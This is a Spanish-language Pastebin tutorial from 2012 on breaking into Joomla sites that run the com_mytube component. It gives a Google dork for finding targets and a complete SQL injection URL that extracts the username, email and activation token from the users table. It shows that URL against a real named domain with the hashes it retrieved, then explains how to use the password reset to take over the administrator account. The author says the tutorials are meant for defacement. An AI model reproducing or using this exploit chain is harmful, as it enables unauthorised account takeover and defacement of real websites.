Advertisement
YeiZeta

Joomla Fail Tutorial YeiZeta"!>

Sep 5th, 2012
498
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.50 KB | None | 0 0
  1. -----------------------------------------------------------------------------------
  2. ___________ ====================================
  3. |.---------.| SEGURIDAD INFORMATICA
  4. ||no jueges|| YEI ZETA (TUTORIAL)>-Medianfire.es.tl .orionDeep
  5. ||al mejor ||=======================================================
  6. ||Operderas||
  7. |'---------'|
  8. `)__ ____('
  9. [=== -- o ]--.
  10. __'---------'__ \
  11. [::::::::::: :::] )
  12. `""'"""""'""""`/T\
  13. \_/
  14. -----------------------------------------------------------------------------------
  15. -Dork
  16. -Remplazar /Index
  17. -AtackSQl
  18. -ResetPassword
  19. -ConfirmacionTest
  20. -AdminLogin
  21. -Administrador /administrador
  22. -----------------------------------------------------------------------------------
  23. ATENCION YEI ZETA POST:Todo los tutoriales quedaran en un limite de personas que
  24. los usen sea para solo publicidad o para un defacement.
  25. -----------------------------------------------------------------------------------
  26. Primero que todo hola soy yei zeta seguridad de redes y paginas webs contactame:
  27.  
  28. lo que haremos es tratar de confirmar una contraseña con el mismo valor de TEst.
  29.  
  30. Comienza.....
  31. -----------------------------------------------------------------------------------
  32. Buscamos la siguiente Dork:inurl:"option=com_mytube" en google la cual nos saldra
  33. unas grandes variedades de paginas escojen una por ejemplo aca tengo la mia.
  34.  
  35. http://test.hariomgroup.net/index.php?view=video&id=4164&option=com_m
  36.  
  37. http://--> no esta protegida en https por si algo nos costaria.
  38. test.hariomgroup.net->Test.Vemos que su confirmacion de test es posiblemente accedible.
  39.  
  40. index.php?view=video&id=4164&option=com_m tenemos el resto de la extencion de la URL
  41. principal que tambien es muy pero muy igual al dork que pusimos en google.
  42. -------------------------------------------------------------------------------------
  43. lo que haremos es remplasarla.
  44.  
  45. Por esta quetenemos aca:
  46.  
  47. /index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
  48. -----------------------------------------------------------------------------------
  49. Nos quedaria haci:
  50.  
  51. http://test.hariomgroup.net/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
  52. -----------------------------------------------------------------------------------
  53. Added: :Administrator:[email protected]:5a390aef7a5e25fd77004551e122fab4:$1$6a4cb497$
  54. From: 25
  55. Views: 8
  56. ----------------------------------------------------------------------------------------
  57. ahora los que nos falta es lo siguiente:
  58.  
  59. Incluir en nuestra direccion:/index.php?option=com_user&view=reset
  60.  
  61. quedaria haci:
  62.  
  63. http://test.hariomgroup.net/index.php?option=com_user&view=reset
  64.  
  65.  
  66. nos pide ahora que escribamos el correo electronico pero el que pondremos es el que encontramos cuando explotamos la web:
  67.  
  68.  
  69. ahora nos saldra:
  70.  
  71.  
  72. ACTUALIZACIÓN: Joomla! 1.5.16 ahora hashes restablecer el token
  73.  
  74. si usted ve algo así: $ 1 $ 14,411: después del código de activación, que no funcionará
  75.  
  76. Si has hecho todo bien, la página se cargará contraseña. Introduzca su contraseña de nuevo .
  77. -----------------------------------------------------------------------------------
  78. Seguridad Informatica:Yei zeta contac:[email protected]
  79. ----------------------------------------------------------------------------------
  80. Bueno si se les hace mas facil solamente
  81.  
  82. Tomamos encuenta esta parte:
  83.  
  84. http://test.hariomgroup.net/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
  85.  
  86. lo cual seria:
  87.  
  88. ContraseñaEncryptada:bf571721b3b59f91ff87153745314ef3:$1$fd8dd059$
  89.  
  90. http://test.hariomgroup.net/administrator/
  91.  
  92. --------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement